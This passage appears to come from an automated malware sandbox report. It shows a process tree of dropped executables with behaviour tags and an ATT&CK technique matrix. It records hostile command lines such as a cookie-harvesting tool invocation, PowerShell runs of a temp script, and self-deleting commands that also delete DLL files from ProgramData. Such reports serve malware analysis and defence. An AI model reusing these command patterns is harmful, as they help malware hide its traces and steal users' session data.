                                                                                                            PID:4880
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:4512
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:6060
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  9⤵
                                                                                                                    PID:5040
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:4440
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                                    8⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:4712
                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                                      9⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Drops file in System32 directory
                                                                                                                      PID:5564
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:4852
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:5236
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:5848
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                          PID:2188
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4709.tmp\tempfile.ps1"
                                                                                                                          8⤵
                                                                                                                            PID:684
                                                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5184
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4136
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                                  3⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4100
                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                    ping 127.0.0.1
                                                                                                                    4⤵
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:772
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks whether UAC is enabled
                                                                                                                PID:3852
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5960
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3944
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2268
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5312
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4608
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1136
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:3316
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Checks processor information in registry
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1060
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                                PID:4672
                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                PID:4724
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:4944
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                1⤵
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                • Modifies registry class
                                                                                                                PID:5012
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                1⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:648
                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4492
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4328
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                    PID:5040
                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                    1⤵
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    PID:3692
                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 242855A235AC2C8B87D34F8B26DF33CC C
                                                                                                                      2⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:4348
                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 0A73018C5BA7035F9B84A489576B132B
                                                                                                                      2⤵
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:4988
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:2256
                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 44DE7A3C8C60BFF4E4BCBE6B1A9E191B E Global\MSI0000
                                                                                                                      2⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:4652
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:3652
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5432
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:4780
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9CB.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9CB.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5532
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1D63.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1D63.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6116
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:4812
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout 1
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5184
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1D63.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1D63.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      PID:5872
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 1D63.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1D63.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        3⤵
                                                                                                                          PID:6092
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im 1D63.exe /f
                                                                                                                            4⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4752
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            4⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:4480
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 1504
                                                                                                                        2⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Program crash
                                                                                                                        PID:5196
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\21F8.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\21F8.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:3512
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\21F8.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\21F8.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4128
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\266E.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\266E.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:6032
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 736
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4936
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 852
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Program crash
                                                                                                                        PID:5064
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 828
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4632
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 896
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6048
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1188
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4324
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1360
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:3316
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1268
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4484
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1364
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5576
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1296
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:496
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1456
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6036
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1472
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5756
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1228
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5900
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1296
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5988
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1464
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5480
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1248
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5168
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1156
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4296
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1328
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:3824
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1216
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5020
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1444
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4116
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1180
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                        PID:4492
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1240
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4644
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1344
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5404
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 612
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5232
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1500
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4676
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1612
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:6076
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1488
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4604
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1736
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5516
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1772
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5028
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1884
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:2212
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1912
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5756
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1940
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        PID:2400
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 1920
                                                                                                                        2⤵
                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                        • Program crash
                                                                                                                        PID:5640
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                      1⤵
                                                                                                                        PID:3568
                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                        C:\Windows\explorer.exe
                                                                                                                        1⤵
                                                                                                                          PID:4628
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:4804
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:5144
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:1332
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:5268
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5740
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:6000
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5844
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:1760
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                    1⤵
                                                                                                                                      PID:416
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:5836
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                        1⤵
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5964
                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                        PID:3828
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5432
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:5720
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:6048
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:4652
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                          1⤵
                                                                                                                                            PID:6084

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                          Execution

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Persistence

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          1
                                                                                                                                          T1060

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          BITS Jobs

                                                                                                                                          1
                                                                                                                                          T1197

                                                                                                                                          Privilege Escalation

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Defense Evasion

                                                                                                                                          Disabling Security Tools

                                                                                                                                          2
                                                                                                                                          T1089

                                                                                                                                          Modify Registry

                                                                                                                                          5
                                                                                                                                          T1112

                                                                                                                                          BITS Jobs

                                                                                                                                          1
                                                                                                                                          T1197

